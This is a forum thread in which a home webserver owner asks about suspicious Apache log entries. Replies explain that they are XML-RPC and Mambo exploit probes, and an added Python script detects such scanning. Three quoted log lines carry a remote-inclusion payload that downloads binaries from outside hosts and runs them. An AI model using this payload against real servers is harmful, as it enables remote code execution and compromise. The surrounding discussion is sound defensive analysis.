My WebServer Logs - Is this an attack?

Hi, I found some weird entries in my webserver access logs.  My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic DNS to locate it.  It is basically just used by friends and family in other states to view pictures of my new baby son.

I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.

NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested.  It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).

I'd appreciate any advice on what you think the logs indicate...  Is this an attack or something innocent?

I'm running apache2.


218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo|  HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

basicinstinct Asked:

jss1199 Commented:
Hi basicinstinct,

You hit the nail on the head.... They are fishing to exploit the xml-rpc for php vulnerability.

http://isc.sans.org/diary.php?storyid=823


Cheers!

jhance Commented:
It's not a problem, however.  Note that all the responses are "404".  That means what was sought was not found.  If this were my server I'd simply put a block on this IP address to prevent further attempts.  You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
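Both answers above reduce to two checks a log reader can automate: jss1199's point that the requested paths (xmlrpc.php under a dozen blog directories, index2.php with a URL stuffed into mosConfig_absolute_path) are probes for software the site does not run, and jhance's point that a burst of 404s from one address is the signature of a scanner worth blocking. The script below is an added example, not code from the thread; it parses Apache combined-format lines, groups them by client address, flags addresses that hit known probe paths, pass a URL inside a query parameter, or pile up 404s inside a short window, and emits Apache 2.2-style "Deny from" lines for the flagged addresses. The sample log is constructed for this example (documentation-range addresses, modeled on the lines in the question); the regular expression, thresholds and function names are the example's own choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format (the format shown in the question). The request
# field is matched non-greedily up to the protocol so a path containing a space
# (as in the question's index2.php lines) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>.*?) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files that belong to blog/CMS packages. A request for one of these on a site
# that serves only family photos is a probe, whatever the response code.
PROBE_FILES = ("xmlrpc.php", "index2.php")

# A query parameter whose value is itself a URL is the shape of a remote file
# inclusion attempt (mosConfig_absolute_path=http://... in the question's log).
RFI_RE = re.compile(r'[?&][^=&]+=https?://', re.IGNORECASE)

# Constructed sample log for this example; addresses are from the
# documentation ranges (RFC 5737), not the ones in the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [06/Apr/2006:14:06:14 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [06/Apr/2006:14:06:16 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.7 - - [06/Apr/2006:14:06:17 +1000] "GET /mambo/index2.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://192.0.2.5/cmd.txt? HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
203.0.113.42 - - [06/Apr/2006:14:10:01 +1000] "GET /baby/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.42 - - [06/Apr/2006:14:10:03 +1000] "GET /baby/photo1.jpg HTTP/1.1" 200 81234 "http://example.invalid/baby/index.html" "Mozilla/5.0"
203.0.113.42 - - [06/Apr/2006:14:10:05 +1000] "GET /favicon.ico HTTP/1.1" 404 1016 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyse(lines, window_seconds=60, min_404=5):
    """Group requests by client address and return {ip: sorted reasons} for flagged addresses.

    An address is flagged if it requests a known probe file, passes a URL inside a
    query parameter, or produces at least min_404 404 responses within window_seconds.
    A single 404 (a missing favicon, a mistyped link) from a legitimate visitor is not enough.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        reasons = set()
        for r in recs:
            path_only = r["path"].split("?", 1)[0]
            if path_only.endswith(PROBE_FILES):
                reasons.add("requests for blog/CMS files this site does not serve")
            if RFI_RE.search(r["path"]):
                reasons.add("URL passed inside a query parameter (remote include attempt)")
        # Burst of 404s: largest number of 404s starting at any one 404 and
        # falling inside the window. Quadratic, which is fine for a home server log.
        not_found = sorted(r["time"] for r in recs if r["status"] == 404)
        best = 0
        for i, t0 in enumerate(not_found):
            n = sum(1 for t in not_found[i:] if (t - t0).total_seconds() <= window_seconds)
            best = max(best, n)
        if best >= min_404:
            reasons.add(f"{best} responses 404 within {window_seconds}s")
        if reasons:
            findings[ip] = sorted(reasons)
    return findings


def deny_directives(findings):
    """Apache 2.2 mod_authz_host lines (inside a <Directory> with 'Order allow,deny') for flagged addresses."""
    return [f"Deny from {ip}" for ip in sorted(findings)]


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG.splitlines())
    for ip, reasons in found.items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
    print("\n".join(deny_directives(found)))
```

Run against a real access log with `analyse(open("/var/log/apache2/access.log").read().splitlines())`; the thresholds are deliberately conservative so that family visitors who trip one or two 404s are left alone, while a scanner like the one in the question is caught by all three rules at once.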
basicinstinct Author Commented:
Thanks for the response - the link to isc.sans.org from jss is very informative.  Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief.  I will indeed block this IP - good idea.

I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.  

Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.

Either way, I intend to contact this website and ask them to PLEASE EXPLAIN.  I will also write to the ISP.  It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought.  Perhaps they think it makes them some sort of "l33t hacker" or something equally silly, but they are just scriptkiddies, following the steps that someone else worked out for them.  I'm upset, but I'll stop raving now.
